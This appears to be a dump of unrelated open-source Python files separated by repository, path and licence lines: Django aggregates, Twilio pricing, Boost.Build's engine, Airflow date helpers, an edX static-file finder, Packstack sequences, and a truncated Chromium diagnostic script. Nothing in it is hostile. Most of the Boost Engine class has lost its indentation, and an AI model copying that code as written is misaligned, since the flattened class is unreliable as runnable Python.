            elif getattr(tmp, 'is_computed', False):
                tmp = self._computed_aggregate_field
            else:
                tmp = tmp.source
        self.field = tmp

    # Two fake fields used to identify aggregate types in data-conversion operations.
    @cached_property
    def _ordinal_aggregate_field(self):
        # Output type for ordinal aggregates such as COUNT.
        return IntegerField()

    @cached_property
    def _computed_aggregate_field(self):
        # Output type for computed aggregates such as AVG.
        return FloatField()

    def relabeled_clone(self, change_map):
        # Shallow copy; only the table alias in ``col`` needs remapping.
        clone = copy.copy(self)
        if isinstance(self.col, (list, tuple)):
            clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
        return clone

    def as_sql(self, compiler, connection):
        "Return the aggregate, rendered as SQL with parameters."
        params = []
        # ``col`` can be a compilable expression, a (table, column) pair,
        # or a bare alias string -- each renders differently.
        if hasattr(self.col, 'as_sql'):
            field_name, params = self.col.as_sql(compiler, connection)
        elif isinstance(self.col, (list, tuple)):
            field_name = '.'.join(compiler(c) for c in self.col)
        else:
            field_name = compiler(self.col)
        substitutions = {
            'function': self.sql_function,
            'field': field_name
        }
        substitutions.update(self.extra)
        return self.sql_template % substitutions, params

    def get_group_by_cols(self):
        # Aggregates themselves never contribute columns to GROUP BY.
        return []

    @property
    def output_field(self):
        return self.field
class Avg(Aggregate):
    """SQL ``AVG()``; ``is_computed`` coerces the result to a float field."""
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    """SQL ``COUNT()``; optionally counts only distinct values."""
    is_ordinal = True
    sql_function = 'COUNT'
    sql_template = '%(function)s(%(distinct)s%(field)s)'

    def __init__(self, col, distinct=False, **extra):
        # Render as COUNT(DISTINCT field) when requested, plain COUNT otherwise.
        distinct_prefix = 'DISTINCT ' if distinct else ''
        super(Count, self).__init__(col, distinct=distinct_prefix, **extra)
class Max(Aggregate):
    """SQL ``MAX()``; output type follows the source field."""
    sql_function = 'MAX'
class Min(Aggregate):
    """SQL ``MIN()``; output type follows the source field."""
    sql_function = 'MIN'
class StdDev(Aggregate):
    """SQL standard deviation; population by default, sample on request."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        if sample:
            self.sql_function = 'STDDEV_SAMP'
        else:
            self.sql_function = 'STDDEV_POP'
class Sum(Aggregate):
    """SQL ``SUM()``; output type follows the source field."""
    sql_function = 'SUM'
class Variance(Aggregate):
    """SQL variance; population by default, sample on request."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        if sample:
            self.sql_function = 'VAR_SAMP'
        else:
            self.sql_function = 'VAR_POP'
Haynie-Research-and-Development/jarvis | deps/lib/python3.4/site-packages/twilio/rest/resources/pricing/phone_numbers.py | 35 | 2261 | from .. import NextGenInstanceResource, NextGenListResource
class PhoneNumbers(object):
    """Holds references to the Number pricing resources."""
    name = "Number"
    key = "Number"

    def __init__(self, base_uri, auth, timeout):
        # Root URI for phone number pricing, e.g. <base_uri>/PhoneNumbers.
        self.uri = "%s/PhoneNumbers" % base_uri
        # Sub-resource: per-country pricing listing/lookup.
        self.countries = PhoneNumberCountries(self.uri, auth, timeout)
class PhoneNumberCountry(NextGenInstanceResource):
    """Pricing information for Twilio Phone Numbers in a specific country.

    Twilio numbers are billed monthly, and the prices returned reflect
    current Twilio list pricing before and after any discounts available for
    the requesting account are applied.

    .. attribute:: country

        The full name of the country.

    .. attribute:: iso_country

        The country's 2-character ISO 3166-1 code.

    .. attribute:: price_unit

        The currency in which prices are measured, in ISO 4127 format
        (e.g. 'usd', 'eur', 'jpy').

    .. attribute:: phone_number_prices

        A list of dicts containing pricing information as follows:
            - type: "local", "mobile", "national", or "toll_free"
            - base_price: the base price per month for this Twilio number type
            - current_price: the current price per month (including discounts)
              for this Twilio number type
    """
    # Instances are addressed by ISO country code instead of a Twilio SID.
    id_key = "iso_country"
class PhoneNumberCountries(NextGenListResource):
    """A list of countries where Twilio Phone Numbers are available.

    The returned list of PhoneNumberCountry objects will not have pricing
    information populated. To get pricing information for a specific country,
    retrieve it with the :meth:`get` method.
    """
    instance = PhoneNumberCountry
    key = "countries"
    name = "Countries"

    def get(self, iso_country):
        """Retrieve pricing information for Twilio Numbers in the specified
        country.

        :param iso_country: The two-letter ISO code for the country
        """
        return self.get_instance(iso_country)

    def list(self):
        """Retrieve the list of countries in which Twilio Numbers are
        available."""
        resp, page = self.request("GET", self.uri)
        countries = page[self.key]
        return [self.load_instance(country) for country in countries]
| gpl-2.0 |
biospi/seamass-windeps | src/boost_1_57_0/tools/build/src/build/engine.py | 14 | 7374 | # Copyright Pedro Ferreira 2005.
# Copyright Vladimir Prus 2007.
# Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
bjam_interface = __import__('bjam')
import operator
import re
import b2.build.property_set as property_set
import b2.util
class BjamAction:
    """Build-engine action whose body was defined from Python."""

    def __init__(self, action_name, function):
        self.action_name = action_name
        self.function = function

    def __call__(self, targets, sources, property_set):
        # Actions defined from Python carry only the command to execute and
        # no associated jam procedural code, so the property set does not
        # need to be forwarded to bjam.
        bjam_interface.call("set-update-action", self.action_name,
                            targets, sources, [])
        if self.function:
            self.function(targets, sources, property_set)
class BjamNativeAction:
    """Build-engine action implemented by Jam code.

    A Python callable may still be associated with the action; it is invoked
    whenever the action is installed on any target.
    """

    def __init__(self, action_name, function):
        self.action_name = action_name
        self.function = function

    def __call__(self, targets, sources, property_set):
        if self.function:
            self.function(targets, sources, property_set)
        properties = []
        if property_set:
            properties = property_set.raw()
        b2.util.set_jam_action(self.action_name, targets, sources, properties)
# Bitmask values for bjam's action modifiers; combined with bitwise-or when
# an action is registered (see Engine.register_action).
action_modifiers = {"updated": 0x01,
                    "together": 0x02,
                    "ignore": 0x04,
                    "quietly": 0x08,
                    "piecemeal": 0x10,
                    "existing": 0x20}
class Engine:
""" The abstract interface to a build engine.
For now, the naming of targets, and special handling of some
target variables like SEARCH and LOCATE make this class coupled
to bjam engine.
"""
def __init__ (self):
self.actions = {}
def add_dependency (self, targets, sources):
"""Adds a dependency from 'targets' to 'sources'
Both 'targets' and 'sources' can be either list
of target names, or a single target name.
"""
if isinstance (targets, str):
targets = [targets]
if isinstance (sources, str):
sources = [sources]
for target in targets:
for source in sources:
self.do_add_dependency (target, source)
def get_target_variable(self, targets, variable):
"""Gets the value of `variable` on set on the first target in `targets`.
Args:
targets (str or list): one or more targets to get the variable from.
variable (str): the name of the variable
Returns:
the value of `variable` set on `targets` (list)
Example:
>>> ENGINE = get_manager().engine()
>>> ENGINE.set_target_variable(targets, 'MY-VAR', 'Hello World')
>>> ENGINE.get_target_variable(targets, 'MY-VAR')
['Hello World']
Equivalent Jam code:
MY-VAR on $(targets) = "Hello World" ;
echo [ on $(targets) return $(MY-VAR) ] ;
"Hello World"
"""
return bjam_interface.call('get-target-variable', targets, variable)
def set_target_variable (self, targets, variable, value, append=0):
""" Sets a target variable.
The 'variable' will be available to bjam when it decides
where to generate targets, and will also be available to
updating rule for that 'taret'.
"""
if isinstance (targets, str):
targets = [targets]
for target in targets:
self.do_set_target_variable (target, variable, value, append)
def set_update_action (self, action_name, targets, sources, properties=property_set.empty()):
""" Binds a target to the corresponding update action.
If target needs to be updated, the action registered
with action_name will be used.
The 'action_name' must be previously registered by
either 'register_action' or 'register_bjam_action'
method.
"""
assert(isinstance(properties, property_set.PropertySet))
if isinstance (targets, str):
targets = [targets]
self.do_set_update_action (action_name, targets, sources, properties)
def register_action (self, action_name, command, bound_list = [], flags = [],
function = None):
"""Creates a new build engine action.
Creates on bjam side an action named 'action_name', with
'command' as the command to be executed, 'bound_variables'
naming the list of variables bound when the command is executed
and specified flag.
If 'function' is not None, it should be a callable taking three
parameters:
- targets
- sources
- instance of the property_set class
This function will be called by set_update_action, and can
set additional target variables.
"""
if self.actions.has_key(action_name):
raise "Bjam action %s is already defined" % action_name
assert(isinstance(flags, list))
bjam_flags = reduce(operator.or_,
(action_modifiers[flag] for flag in flags), 0)
# We allow command to be empty so that we can define 'action' as pure
# python function that would do some conditional logic and then relay
# to other actions.
assert command or function
if command:
bjam_interface.define_action(action_name, command, bound_list, bjam_flags)
self.actions[action_name] = BjamAction(action_name, function)
def register_bjam_action (self, action_name, function=None):
"""Informs self that 'action_name' is declared in bjam.
From this point, 'action_name' is a valid argument to the
set_update_action method. The action_name should be callable
in the global module of bjam.
"""
# We allow duplicate calls to this rule for the same
# action name. This way, jamfile rules that take action names
# can just register them without specially checking if
# action is already registered.
if not self.actions.has_key(action_name):
self.actions[action_name] = BjamNativeAction(action_name, function)
# Overridables
def do_set_update_action (self, action_name, targets, sources, property_set):
action = self.actions.get(action_name)
if not action:
raise Exception("No action %s was registered" % action_name)
action(targets, sources, property_set)
def do_set_target_variable (self, target, variable, value, append):
if append:
bjam_interface.call("set-target-variable", target, variable, value, "true")
else:
bjam_interface.call("set-target-variable", target, variable, value)
    def do_add_dependency (self, target, source):
        # Record in bjam that 'target' depends on 'source' (native DEPENDS rule).
        bjam_interface.call("DEPENDS", target, source)
| apache-2.0 |
sergiohgz/incubator-airflow | airflow/utils/dates.py | 4 | 9493 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from airflow.utils import timezone
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta # for doctest
import six
from croniter import croniter
# Human-friendly schedule aliases mapped to their five-field cron expressions.
cron_presets = {
    '@hourly': '0 * * * *',
    '@daily': '0 0 * * *',
    '@weekly': '0 0 * * 0',
    '@monthly': '0 0 1 * *',
    '@yearly': '0 0 1 1 *',
}
def date_range(
        start_date,
        end_date=None,
        num=None,
        delta=None):
    """
    Get a set of dates as a list based on a start, end and delta, delta
    can be something that can be added to ``datetime.datetime``
    or a cron expression as a ``str``

    :param start_date: anchor date to start the series from
    :type start_date: datetime.datetime
    :param end_date: right boundary for the date range
    :type end_date: datetime.datetime
    :param num: alternatively to end_date, you can specify the number of
        number of entries you want in the range. This number can be negative,
        output will always be sorted regardless
    :type num: int

    >>> date_range(datetime(2016, 1, 1), datetime(2016, 1, 3), delta=timedelta(1))
    [datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 1, 2, 0, 0),
    datetime.datetime(2016, 1, 3, 0, 0)]
    >>> date_range(datetime(2016, 1, 1), datetime(2016, 1, 3), delta='0 0 * * *')
    [datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 1, 2, 0, 0),
    datetime.datetime(2016, 1, 3, 0, 0)]
    >>> date_range(datetime(2016, 1, 1), datetime(2016, 3, 3), delta="0 0 0 * *")
    [datetime.datetime(2016, 1, 1, 0, 0), datetime.datetime(2016, 2, 1, 0, 0),
    datetime.datetime(2016, 3, 1, 0, 0)]
    """
    # Without a step there is nothing to generate.
    if not delta:
        return []
    if end_date and start_date > end_date:
        raise Exception("Wait. start_date needs to be before end_date")
    if end_date and num:
        raise Exception("Wait. Either specify end_date OR num")
    # Neither bound given: generate up to "now".
    if not end_date and not num:
        end_date = timezone.utcnow()

    delta_iscron = False
    tz = start_date.tzinfo
    if isinstance(delta, six.string_types):
        # A string delta is a cron expression; croniter works on naive
        # datetimes, so strip the tz and restore it on each emitted value.
        delta_iscron = True
        start_date = timezone.make_naive(start_date, tz)
        cron = croniter(delta, start_date)
    elif isinstance(delta, timedelta):
        # Direction is controlled by the sign of `num`, not of delta.
        delta = abs(delta)
    dates = []
    if end_date:
        # Keep both bounds naive or both aware so comparison is legal.
        if timezone.is_naive(start_date):
            end_date = timezone.make_naive(end_date, tz)
        while start_date <= end_date:
            if timezone.is_naive(start_date):
                dates.append(timezone.make_aware(start_date, tz))
            else:
                dates.append(start_date)

            if delta_iscron:
                start_date = cron.get_next(datetime)
            else:
                start_date += delta
    else:
        # Fixed-count mode: negative `num` walks backwards in time.
        for _ in range(abs(num)):
            if timezone.is_naive(start_date):
                dates.append(timezone.make_aware(start_date, tz))
            else:
                dates.append(start_date)

            if delta_iscron:
                if num > 0:
                    start_date = cron.get_next(datetime)
                else:
                    start_date = cron.get_prev(datetime)
            else:
                if num > 0:
                    start_date += delta
                else:
                    start_date -= delta
    # Output is always ascending regardless of generation direction.
    return sorted(dates)
def round_time(dt, delta, start_date=timezone.make_aware(datetime.min)):
    """
    Returns the datetime of the form start_date + i * delta
    which is closest to dt for any non-negative integer i.

    Note that delta may be a datetime.timedelta or a dateutil.relativedelta.
    When delta is a ``str`` it is treated as a cron expression instead.

    NOTE(review): the default start_date is evaluated once at import time;
    mixing a naive dt with the aware default start_date will raise on
    comparison — callers appear to pass matching-awareness values; confirm.

    >>> round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
    datetime.datetime(2015, 1, 1, 0, 0)
    >>> round_time(datetime(2015, 1, 2), relativedelta(months=1))
    datetime.datetime(2015, 1, 1, 0, 0)
    >>> round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
    datetime.datetime(2015, 9, 16, 0, 0)
    >>> round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
    datetime.datetime(2015, 9, 15, 0, 0)
    >>> round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
    datetime.datetime(2015, 9, 14, 0, 0)
    >>> round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(2015, 9, 14, 0, 0))
    datetime.datetime(2015, 9, 14, 0, 0)
    """
    if isinstance(delta, six.string_types):
        # It's cron based, so it's easy: the previous cron fire at or
        # before start_date is the rounded value.
        tz = start_date.tzinfo
        start_date = timezone.make_naive(start_date, tz)
        cron = croniter(delta, start_date)
        prev = cron.get_prev(datetime)
        if prev == start_date:
            return timezone.make_aware(start_date, tz)
        else:
            return timezone.make_aware(prev, tz)

    # Ignore the microseconds of dt
    dt -= timedelta(microseconds=dt.microsecond)

    # We are looking for a datetime in the form start_date + i * delta
    # which is as close as possible to dt. Since delta could be a relative
    # delta we don't know its exact length in seconds so we cannot rely on
    # division to find i. Instead we employ a binary search algorithm, first
    # finding an upper and lower limit and then disecting the interval until
    # we have found the closest match.

    # We first search an upper limit for i for which start_date + upper * delta
    # exceeds dt.
    upper = 1
    while start_date + upper*delta < dt:
        # To speed up finding an upper limit we grow this exponentially by a
        # factor of 2
        upper *= 2

    # Since upper is the first value for which start_date + upper * delta
    # exceeds dt, upper // 2 is below dt and therefore forms a lower limited
    # for the i we are looking for
    lower = upper // 2

    # We now continue to intersect the interval between
    # start_date + lower * delta and start_date + upper * delta
    # until we find the closest value
    while True:
        # Invariant: start + lower * delta < dt <= start + upper * delta
        # If start_date + (lower + 1)*delta exceeds dt, then either lower or
        # lower+1 has to be the solution we are searching for
        if start_date + (lower + 1)*delta >= dt:
            # Check if start_date + (lower + 1)*delta or
            # start_date + lower*delta is closer to dt and return the solution
            if (
                    (start_date + (lower + 1) * delta) - dt <=
                    dt - (start_date + lower * delta)):
                return start_date + (lower + 1)*delta
            else:
                return start_date + lower * delta

        # We intersect the interval and either replace the lower or upper
        # limit with the candidate
        candidate = lower + (upper - lower) // 2
        if start_date + candidate*delta >= dt:
            upper = candidate
        else:
            lower = candidate

    # in the special case when start_date > dt the search for upper will
    # immediately stop for upper == 1 which results in lower = upper // 2 = 0
    # and this function returns start_date.
def infer_time_unit(time_seconds_arr):
    """
    Determine the most appropriate time unit for an array of time durations
    specified in seconds.

    A unit is chosen so that the largest duration stays within twice that
    unit's next magnitude, e.g. 5400 seconds => 'minutes',
    36000 seconds => 'hours'. An empty array defaults to 'hours'.
    """
    if not time_seconds_arr:
        return 'hours'
    longest = max(time_seconds_arr)
    # (ceiling in seconds, unit) pairs, checked smallest-first:
    # 2 minutes, 2 hours, 2 days — same thresholds as 60*2, 60*60*2, 24*60*60*2.
    for ceiling, unit in ((120, 'seconds'), (7200, 'minutes'), (172800, 'hours')):
        if longest <= ceiling:
            return unit
    return 'days'
def scale_time_units(time_seconds_arr, unit):
    """
    Convert an array of time durations in seconds to the specified time unit.

    :param time_seconds_arr: durations in seconds.
    :param unit: 'minutes', 'hours' or 'days'; any other value (including
        'seconds') returns the input unchanged, as before.
    :return: list of floats for known units, otherwise the original array.
    """
    # Factor table replaces three near-identical map/lambda branches.
    seconds_per_unit = {
        'minutes': 60.0,
        'hours': 60.0 * 60,
        'days': 24.0 * 60 * 60,
    }
    factor = seconds_per_unit.get(unit)
    if factor is None:
        # Unknown (or 'seconds') unit: hand back the values as-is.
        return time_seconds_arr
    return [x / factor for x in time_seconds_arr]
def days_ago(n, hour=0, minute=0, second=0, microsecond=0):
    """
    Get a datetime object representing `n` days ago. By default the time is
    set to midnight.
    """
    anchor = timezone.utcnow().replace(
        hour=hour,
        minute=minute,
        second=second,
        microsecond=microsecond)
    return anchor - timedelta(days=n)
def parse_execution_date(execution_date_str):
    """
    Parse execution date string to datetime object.

    Thin wrapper over ``airflow.utils.timezone.parse``; accepts whatever
    string formats that helper supports (presumably ISO 8601 — confirm
    against timezone.parse).
    """
    return timezone.parse(execution_date_str)
| apache-2.0 |
waheedahmed/edx-platform | openedx/core/lib/xblock_pipeline/finder.py | 27 | 4672 | """
Django pipeline finder for handling static assets required by XBlocks.
"""
from datetime import datetime
import os
from pkg_resources import resource_exists, resource_listdir, resource_isdir, resource_filename
from xblock.core import XBlock
from django.contrib.staticfiles import utils
from django.contrib.staticfiles.finders import BaseFinder
from django.contrib.staticfiles.storage import FileSystemStorage
from django.core.files.storage import Storage
class XBlockPackageStorage(Storage):
    """
    Storage implementation for accessing XBlock package resources.

    Adapts ``pkg_resources`` lookups so static assets shipped inside an
    XBlock's Python package can be collected/served like ordinary static
    files by Django's staticfiles machinery.
    """

    # Prefix added to every collected path so xblock assets live under a
    # dedicated subtree of STATIC_ROOT.
    RESOURCE_PREFIX = 'xblock/resources/'

    def __init__(self, module, base_dir, *args, **kwargs):
        """
        Returns a static file storage if available in the given app.

        module: dotted name of the XBlock's Python package.
        base_dir: resource directory inside that package (may be None
        when the block ships no resources).
        """
        super(XBlockPackageStorage, self).__init__(*args, **kwargs)
        self.module = module
        self.base_dir = base_dir

        # Register a prefix that collectstatic will add to each path
        self.prefix = os.path.join(self.RESOURCE_PREFIX, module)

    def path(self, name):
        """
        Returns a file system filename for the specified file name.
        """
        return resource_filename(self.module, os.path.join(self.base_dir, name))

    def exists(self, path):
        """
        Returns True if the specified path exists.
        """
        if self.base_dir is None:
            return False

        return resource_exists(self.module, os.path.join(self.base_dir, path))

    def listdir(self, path):
        """
        Lists the directories beneath the specified path.

        Returns a (directories, files) pair. Python sources and Sass
        files are filtered out since they are not servable assets.
        """
        directories = []
        files = []
        for item in resource_listdir(self.module, os.path.join(self.base_dir, path)):
            __, file_extension = os.path.splitext(item)
            if file_extension not in [".py", ".pyc", ".scss"]:
                if resource_isdir(self.module, os.path.join(self.base_dir, path, item)):
                    directories.append(item)
                else:
                    files.append(item)
        return directories, files

    def open(self, name, mode='rb'):
        """
        Retrieves the specified file from storage.
        """
        path = self.path(name)
        return FileSystemStorage(path).open(path, mode)

    def size(self, name):
        """
        Returns the size of the package resource.
        """
        return os.path.getsize(self.path(name))

    def accessed_time(self, name):
        """
        Returns the last-accessed time of the package resource.
        """
        return datetime.fromtimestamp(os.path.getatime(self.path(name)))

    def created_time(self, name):
        """
        Returns the created time of the package resource.
        """
        return datetime.fromtimestamp(os.path.getctime(self.path(name)))

    def modified_time(self, name):
        """
        Returns the modified time of the resource.
        """
        return datetime.fromtimestamp(os.path.getmtime(self.path(name)))

    def url(self, name):
        """
        Note: package resources do not support URLs
        """
        raise NotImplementedError("Package resources do not support URLs")

    def delete(self, name):
        """
        Note: deleting files from a package is not supported.
        """
        raise NotImplementedError("Deleting files from a package is not supported")
class XBlockPipelineFinder(BaseFinder):
    """
    A static files finder that gets static assets from xblocks.
    """

    def __init__(self, *args, **kwargs):
        # Build one package storage per installed XBlock class; the set
        # de-dupes classes exposed by multiple entry points.
        super(XBlockPipelineFinder, self).__init__(*args, **kwargs)
        xblock_classes = set()
        for __, xblock_class in XBlock.load_classes():
            xblock_classes.add(xblock_class)
        self.package_storages = [
            XBlockPackageStorage(xblock_class.__module__, xblock_class.get_resources_dir())
            for xblock_class in xblock_classes
        ]

    def list(self, ignore_patterns):
        """
        List all static files in all xblock packages.

        Yields (path, storage) pairs, as Django's collectstatic expects.
        """
        for storage in self.package_storages:
            if storage.exists(''):  # check if storage location exists
                for path in utils.get_files(storage, ignore_patterns):
                    yield path, storage

    def find(self, path, all=False):  # pylint: disable=redefined-builtin
        """
        Looks for files in the xblock package directories.

        Returns the first matching absolute path, or every match as a
        list when ``all`` is True (Django finder contract).
        """
        matches = []
        for storage in self.package_storages:
            if storage.exists(path):
                match = storage.path(path)
                if not all:
                    return match
                matches.append(match)
        return matches
| agpl-3.0 |
openstack/packstack | packstack/installer/core/sequences.py | 6 | 3650 | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Base class for steps & sequences
"""
import sys
import logging
import traceback
from .. import utils
from ..exceptions import SequenceError
class Step(object):
    """
    A single named setup step wrapping a callable taking (config, messages).
    """
    def __init__(self, name, function, title=None):
        """
        name: identifier of the step.
        function: callable invoked as function(config, messages).
        title: human-readable label; defaults to 'Step: <name>'.
        """
        self.name = name
        if title:
            self.title = title
        else:
            self.title = 'Step: %s' % name

        # Reject non-callable step bodies up front.
        if function and not callable(function):
            raise SequenceError("Function object have to be callable. "
                                "Object %s is not callable." % function)
        self.function = function

    def run(self, config=None, messages=None):
        """
        Execute the step, echoing a colored DONE/ERROR state line on stdout.
        Exceptions from the step function are logged and re-raised.
        """
        if config is None:
            config = {}
        if messages is None:
            messages = []

        # TO-DO: complete logger name when logging will be setup correctly
        log = logging.getLogger()
        log.debug('Running step %s.' % self.name)

        try:
            self.function(config, messages)
        except Exception:
            log.debug(traceback.format_exc())
            sys.stdout.write(
                '%s\n' % utils.state_message(self.title, 'ERROR', 'red'))
            sys.stdout.flush()
            raise
        # Success path: the except branch above always re-raises, so
        # reaching this point means the step completed.
        sys.stdout.write(
            '%s\n' % utils.state_message(self.title, 'DONE', 'green'))
        sys.stdout.flush()
class Sequence(object):
    """
    An ordered collection of Steps, optionally gated on a config option.
    """
    def __init__(self, name, steps, title=None, condition=None,
                 cond_match=None):
        """
        steps: iterable of dicts with 'name', 'function' and optional
        'title' keys; order of iteration is preserved.
        condition/cond_match: when set, the sequence only runs if
        config[condition] == cond_match.
        """
        self.name = name
        self.title = title
        self.condition = condition
        self.cond_match = cond_match

        # Build the ordered name -> Step mapping.
        self.steps = utils.SortedDict()
        for spec in steps:
            step_name = spec['name']
            self.steps[step_name] = Step(step_name, spec['function'],
                                         title=spec.get('title'))

    def validate_condition(self, config):
        """
        Returns True if config option condition has value given
        in cond_match. Otherwise returns False.
        """
        # No condition configured means the sequence always runs.
        if not self.condition:
            return True
        return config.get(self.condition) == self.cond_match

    def run(self, config=None, messages=None, step=None):
        """
        Runs sequence of steps. Runs only specific step if step's name
        is given via 'step' parameter.
        """
        if config is None:
            config = {}
        if messages is None:
            messages = []

        if not self.validate_condition(config):
            return

        # Single-step mode short-circuits the full run.
        if step:
            self.steps[step].run(config=config, messages=messages)
            return

        logger = logging.getLogger()
        logger.debug('Running sequence %s.' % self.name)

        if self.title:
            sys.stdout.write('%s\n' % self.title)
            sys.stdout.flush()
        for step in self.steps.itervalues():
            step.run(config=config, messages=messages)
| apache-2.0 |
havard024/prego | venv/lib/python2.7/site-packages/django/db/models/sql/aggregates.py | 195 | 3977 | """
Classes to represent the default SQL aggregate functions
"""
from django.db.models.fields import IntegerField, FloatField
# Fake fields used to identify aggregate types in data-conversion operations.
# Shared singletons: ordinal aggregates (e.g. COUNT) coerce their database
# values to integers, computed ones (e.g. AVG) to floats.
ordinal_aggregate_field = IntegerField()
computed_aggregate_field = FloatField()
class Aggregate(object):
    """
    Default SQL Aggregate.
    """
    is_ordinal = False
    is_computed = False
    sql_template = '%(function)s(%(field)s)'

    def __init__(self, col, source=None, is_summary=False, **extra):
        """Instantiate an SQL aggregate

         * col is a column reference describing the subject field
           of the aggregate. It can be an alias, or a tuple describing
           a table and column name.
         * source is the underlying field or aggregate definition for
           the column reference. If the aggregate is not an ordinal or
           computed type, this reference is used to determine the coerced
           output type of the aggregate.
         * extra is a dictionary of additional data to provide for the
           aggregate definition

        Also utilizes the class variables:
         * sql_function, the name of the SQL function that implements the
           aggregate.
         * sql_template, a template string that is used to render the
           aggregate into SQL.
         * is_ordinal, a boolean indicating if the output of this aggregate
           is an integer (e.g., a count)
         * is_computed, a boolean indicating if this output of this aggregate
           is a computed float (e.g., an average), regardless of the input
           type.
        """
        self.col = col
        self.source = source
        self.is_summary = is_summary
        self.extra = extra

        # Follow the chain of aggregate sources back until you find an
        # actual field, or an aggregate that forces a particular output
        # type. This type of this field will be used to coerce values
        # retrieved from the database.
        tmp = self

        while tmp and isinstance(tmp, Aggregate):
            if getattr(tmp, 'is_ordinal', False):
                tmp = ordinal_aggregate_field
            elif getattr(tmp, 'is_computed', False):
                tmp = computed_aggregate_field
            else:
                tmp = tmp.source

        self.field = tmp

    def relabel_aliases(self, change_map):
        # Re-point the table alias of a (table, column) reference after a
        # query re-aliases its joins; plain string columns are untouched.
        if isinstance(self.col, (list, tuple)):
            self.col = (change_map.get(self.col[0], self.col[0]), self.col[1])

    def as_sql(self, qn, connection):
        "Return the aggregate, rendered as SQL."
        if hasattr(self.col, 'as_sql'):
            # The column knows how to render itself (nested expression).
            field_name = self.col.as_sql(qn, connection)
        elif isinstance(self.col, (list, tuple)):
            # (table, column) pair: quote both parts with qn.
            field_name = '.'.join([qn(c) for c in self.col])
        else:
            field_name = self.col

        params = {
            'function': self.sql_function,
            'field': field_name
        }
        # extra may override/add template keys (e.g. 'distinct' for Count).
        params.update(self.extra)

        return self.sql_template % params
class Avg(Aggregate):
    """SQL AVG; result is always coerced to float."""
    is_computed = True
    sql_function = 'AVG'
class Count(Aggregate):
    """SQL COUNT, optionally COUNT(DISTINCT ...); result is always an int."""
    is_ordinal = True
    sql_function = 'COUNT'
    # Template gains a 'distinct' slot filled via the extra dict.
    sql_template = '%(function)s(%(distinct)s%(field)s)'

    def __init__(self, col, distinct=False, **extra):
        # Conditional expression replaces the fragile `x and a or b` idiom;
        # behavior is identical for all truthy/falsy `distinct` values.
        super(Count, self).__init__(
            col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
    """SQL MAX; output type follows the source field."""
    sql_function = 'MAX'
class Min(Aggregate):
    """SQL MIN; output type follows the source field."""
    sql_function = 'MIN'
class StdDev(Aggregate):
    """SQL standard deviation; sample=True selects the sample variant."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(StdDev, self).__init__(col, **extra)
        # Conditional expression replaces the fragile `x and a or b` idiom.
        self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
    """SQL SUM; output type follows the source field."""
    sql_function = 'SUM'
class Variance(Aggregate):
    """SQL variance; sample=True selects the sample variant."""
    is_computed = True

    def __init__(self, col, sample=False, **extra):
        super(Variance, self).__init__(col, **extra)
        # Conditional expression replaces the fragile `x and a or b` idiom.
        self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| mit |
XiaosongWei/chromium-crosswalk | tools/diagnose-me.py | 128 | 3534 | #!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Diagnose some common system configuration problems on Linux, and
suggest fixes."""
import os
import subprocess
import sys
# Registry of (name, check_function) pairs, populated by @Check.
all_checks = []


def Check(name):
    """Decorator that registers a diagnostic check under *name*."""
    def register(func):
        all_checks.append((name, func))
        return func
    return register
@Check("/usr/bin/ld is not gold")
def CheckSystemLd():
proc = subprocess.Popen(['/usr/bin/ld', '-v'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'GNU gold' in stdout:
return ("When /usr/bin/ld is gold, system updates can silently\n"
"corrupt your graphics drivers.\n"
"Try 'sudo apt-get remove binutils-gold'.\n")
return None
@Check("random lds are not in the $PATH")
def CheckPathLd():
proc = subprocess.Popen(['which', '-a', 'ld'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
instances = stdout.split()
if len(instances) > 1:
return ("You have multiple 'ld' binaries in your $PATH:\n"
+ '\n'.join(' - ' + i for i in instances) + "\n"
"You should delete all of them but your system one.\n"
"gold is hooked into your build via gyp.\n")
return None
@Check("/usr/bin/ld doesn't point to gold")
def CheckLocalGold():
# Check /usr/bin/ld* symlinks.
for path in ('ld.bfd', 'ld'):
path = '/usr/bin/' + path
try:
target = os.readlink(path)
except OSError, e:
if e.errno == 2:
continue # No such file
